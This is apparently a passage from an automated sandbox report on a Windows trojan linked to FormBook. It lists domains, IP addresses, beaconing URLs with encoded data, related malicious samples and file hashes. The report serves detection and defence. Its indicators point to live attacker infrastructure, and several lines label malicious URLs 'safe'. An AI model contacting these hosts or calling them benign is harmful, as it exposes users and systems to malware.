                                    		truefalse
                                      		unknown
                                      www.migraine-massages.pro
                                      		199.59.243.227
                                      		truefalse
                                        		unknown
                                        ppp84k45ss7ehy8ypic5x.limelightcdn.com
                                        		23.106.59.18
                                        		truefalse
                                          		unknown
                                          www.bulls777.pro
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.astorg-group.info
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.bio-thymus.com
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.marketprediction.app
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.fiqsth.vip
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.vehiculargustav.click
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.corpseflowerwatch.org
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.vnxoso88.art
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.066bet.xyz
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.4nk.education
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.4nk.education/gnvu/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.evoo.website/293d/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.vehiculargustav.click/95c0/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.vnxoso88.art/d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fiqsth.vip/0m8a/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.yushaliu.online/fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.corpseflowerwatch.org/yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.wukong.college/9ezc/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.kdtzhb.top/1iqa/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.migraine-massages.pro/ym43/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.vnxoso88.art/d26j/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.evoo.website/293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fiqsth.vip/0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.wukong.college/9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.4nk.education/gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.yushaliu.online/fjsq/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.kdtzhb.top/1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.astorg-group.info/vdvc/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.pluribiz.life/afcr/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.bio-thymus.com/ezyn/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.migraine-massages.pro/ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.bio-thymus.com/ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.marketprediction.app/ucmb/false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.astorg-group.info/vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8jfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://duckduckgo.com/chrome_newtabnet.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dts.gnpge.comnet.exe, 00000004.00000002.3871744953.000000000523E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/ac/?q=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://whois.gandi.net/en/results?search=4nk.educationIislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.marketprediction.appIislGDEHlLEZDm.exe, 00000003.00000002.3877376755.0000000006824000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gandi.net/en/domainIislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.yushaliu.online/sk-logabpstatus.php?a=OGs3TzBFWW1ya0l1U1JtY2lBQTZqZElWK1FuVzRYVjB2clVPR0cnet.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.ecosia.org/newtab/net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://whois.gandi.net/en/results?search=astorg-group.infoIislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://ac.ecosia.org/autocomplete?q=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.comIislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000004A88000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000040F8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referIislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000004C1A000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.000000000428A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.yushaliu.online/px.js?ch=1net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.yushaliu.online/px.js?ch=2net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        47.52.221.8
                                                                                        		www.wukong.collegeUnited States
                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                        128.65.195.180
                                                                                        		www.evoo.websiteSwitzerland
                                                                                        		29222INFOMANIAK-ASCHfalse
                                                                                        23.106.59.18
                                                                                        		ppp84k45ss7ehy8ypic5x.limelightcdn.comUnited Kingdom
                                                                                        		205544LEASEWEB-UK-LON-11GBfalse
                                                                                        199.59.243.227
                                                                                        		www.migraine-massages.proUnited States
                                                                                        		395082BODIS-NJUSfalse
                                                                                        217.70.184.50
                                                                                        		webredir.vip.gandi.netFrance
                                                                                        		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                                        208.91.197.27
                                                                                        		www.yushaliu.onlineVirgin Islands (BRITISH)
                                                                                        		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                        209.74.64.58
                                                                                        		www.pluribiz.lifeUnited States
                                                                                        		31744MULTIBAND-NEWHOPEUSfalse
                                                                                        66.29.146.14
                                                                                        		vnxoso88.artUnited States
                                                                                        		19538ADVANTAGECOMUSfalse
                                                                                        3.33.130.190
                                                                                        		fiqsth.vipUnited States
                                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                                        47.242.89.146
                                                                                        		www.kdtzhb.topUnited States
                                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1550245
                                                                                        Start date and time:2024-11-06 15:58:13 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 34s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:10
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:1
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:XhAQ0Rk63O.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@16/10
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 90%
                                                                                        • Number of executed functions: 42
                                                                                        • Number of non-executed functions: 312
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • VT rate limit hit for: XhAQ0Rk63O.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        10:00:00API Interceptor10197300x Sleep call for process: net.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        128.65.195.180TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.airbnbneuchatel.com/0zfk/
                                                                                        Inquiry Second Reminder.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
                                                                                        LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
                                                                                        PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
                                                                                        LGSTXJeTc4.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
                                                                                        MVEjijPB3m.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
                                                                                        luK5jtgopg.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.zimmerli.online/btrd/?_vgLOdj=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&W0Ddg8=u2Jd-dT8bPB0k
                                                                                        iKF9HO6p8LJfhir.exeGet hashmaliciousFormBook, PlayBrowse
                                                                                        • www.derbychess.com/qfhc/?cNu_sBI=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkVKyniTIgT66iQ==&mg3Oy_=oFKCX
                                                                                        IN0982746R789.exeGet hashmaliciousFormBook, PlayBrowse
                                                                                        • www.derbychess.com/qfhc/?JmZH=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkX7o5TTIhSCIiQ==&e_6PiF=8ZYjPlE
                                                                                        EEcbDKtUD5MqK0g.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.derbychess.com/qfhc/?eNcLv2J=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQAt27vs3PAxgHskA==&mq=srEb2z_f
                                                                                        23.106.59.18SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
                                                                                        • dotdo.net/chkn.php?n=4528372
                                                                                        199.59.243.227BkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.deepfy.xyz/jlkn/
                                                                                        FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.master7.space/0i43/
                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                        • www.auto-deals-cz-000.buzz/geci/
                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.lowerbackpain.site/t9om/
                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rebel.tienda/7n9v/
                                                                                        NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.deepfy.xyz/jlkn/
                                                                                        nCYUA8nqsg.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.coworking-jp-aa.click/xa2o/?JB=NJsDlniUbQYDatfhfDHPvwFd/AWSP7AhFfxHSrFrjljMI6G4ERIdsA2z0osvS6jhoZboHyHHqbRD6RaIDTbJ7qLt4qENU/l5boxOGvM5d+51kNkCDA==&3B6=Cv40V
                                                                                        SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                        • www.adsdomain-195.click/q3rc/
                                                                                        debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.deepfy.xyz/0zsv/
                                                                                        PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.9net88.net/ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        www.pluribiz.lifeMV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                                        • 209.74.64.58
                                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 209.74.64.58
                                                                                        webredir.vip.gandi.netSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        CENA.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                        • 217.70.184.50
                                                                                        www.migraine-massages.proSWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        INFOMANIAK-ASCHhttps://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                        • 128.65.195.91
                                                                                        https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                                        • 128.65.195.91
                                                                                        z95ordemdecomprapdfx4672xx.exeGet hashmaliciousFormBookBrowse
                                                                                        • 84.16.66.164
                                                                                        Doc.exeGet hashmaliciousSliverBrowse
                                                                                        • 128.65.199.135
                                                                                        Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 84.16.66.164
                                                                                        TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                                        • 128.65.195.180
                                                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                        • 84.16.66.164
                                                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                                                        • 84.16.66.164
                                                                                        xP1455Elxv.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 185.176.232.182
                                                                                        https://i.printboxalgerie.com/chsbb/ch/Get hashmaliciousUnknownBrowse
                                                                                        • 185.125.25.41
                                                                                        BODIS-NJUSBkZqIS5vlv.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        FzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        nCYUA8nqsg.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        debit#U00a0note#U00a0607-36099895#U00a0#U00a0.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                        • 199.59.243.227
                                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdChttps://media.nomadsport.net/Culture/SetCulture?culture=en&returnUrl=https://t.ly/qrCwtGet hashmaliciousUnknownBrowse
                                                                                        • 47.253.61.56
                                                                                        http://bankllist.usGet hashmaliciousUnknownBrowse
                                                                                        • 47.253.61.56
                                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                        • 8.210.3.99
                                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                        • 8.217.17.192
                                                                                        En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                        • 8.210.49.139
                                                                                        mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                                        • 47.242.252.174
                                                                                        arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                        • 47.251.12.143
                                                                                        sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                        • 8.212.58.110
                                                                                        https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XSwDnNeW8yycT&sa=t&esrc=nNeW8FA0xys8Em2FL&source=&cd=tS6T8Tiw9XH&cad=XpPkDfJXVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=am%70%2F%77%77%77%2E%64%65%72%79%61%6E%63%6F%6E%73%75%6C%74%69%6E%67%2E%63%6F%6D%2F%74%31%62%72%6F%77%6E%34%35%2F1112449584/aGVsZW5AY3VyZXBhcmtpbnNvbnMub3JnLnVrGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                        • 47.251.66.114
                                                                                        QH6Ue0xtNZ.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                                        • 8.218.85.22
                                                                                        LEASEWEB-UK-LON-11GBSecuriteInfo.com.FileRepMalware.27261.32754.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        SecuriteInfo.com.ELF.Agent-AIN.28488.28782.elfGet hashmaliciousMiraiBrowse
                                                                                        • 95.168.183.162
                                                                                        SecuriteInfo.com.FileRepMalware.15071.2577.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.18
                                                                                        5672D5B80770DEB68BF2435FEF12D521C04CE012250CC.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        F85362FA96806CE4FF93B8A49E0E74F65DEA0B759AE87.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        d47b38d68c7ef6c19add401c1c6defb99aef1fac8fd28.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        69e6517b2ee056dd1f5f70c46faf6235b84db97a74a65.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52
                                                                                        w1J9KDIC0m.exeGet hashmaliciousUnknownBrowse
                                                                                        • 23.106.59.52

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Temp\Citlaltpetl

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):288768
                                                                                        Entropy (8bit):7.992758448095575
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:RcaESRoMY/wMqPfKNEmrDnPx59PL5U3KkOE5yr5b8r0Agn:RXESEYpPS+mrDPD9P+6E5dw
                                                                                        MD5:88E0FEBCEC4114CC07AF5A64B5DF726A
                                                                                        SHA1:6FAEBFD1D2014326AE99059647A3271CAC757602
                                                                                        SHA-256:55AE03B200D59BFA0A36F83BAFB1C13FDDACC1688FE766366648755A2F89F0A9
                                                                                        SHA-512:E2AACF503C4E6EB673DD42B2F42AF9585F0B8041758D5C4CDEE07EBE90AED1281882DC2B231644994F7C5E995DEAA96414DEC590F094777F8039DAD6434AC45B
                                                                                        Malicious:false
                                                                                        Reputation:low
